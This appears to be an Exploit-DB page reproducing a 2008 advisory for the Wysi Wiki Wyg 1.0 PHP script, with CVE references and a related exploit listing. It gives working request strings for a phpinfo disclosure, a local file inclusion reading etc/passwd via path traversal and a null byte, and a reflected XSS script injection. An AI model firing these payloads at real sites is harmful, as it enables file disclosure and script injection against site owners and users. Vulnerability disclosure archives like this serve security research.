/* Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities ---------------------------------------------------------- By StAkeR[at]hotmail[dot]it http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip ---------------------------------------------------------- 1- PHPInfo Disclosure - index.php?categup=isset 2- Local File Inclusion (LFI) (MQ Off) - index.php?c=../../../&a=etc/passwd%00 3- Cross Site Scripting (XSS) - index.php?c=wikiwizi&a=recherche&s=<script>[Javascript]</script> */ # milw0rm.com [2008-10-20]
Related Exploits
Trying to match CVEs (3): CVE-2008-3205, CVE-2008-5322, CVE-2008-5323Trying to match OSVDBs (3): 47022, 50462, 50586
Other Possible E-DB Search Terms: Wysi Wiki Wyg 1.0, Wysi Wiki Wyg
Date | D | V | Title | Author |
---|---|---|---|---|
2008-12-12 |
![]() |
Wysi Wiki Wyg 1.0 - Remote Password Retrieve | StAkeR |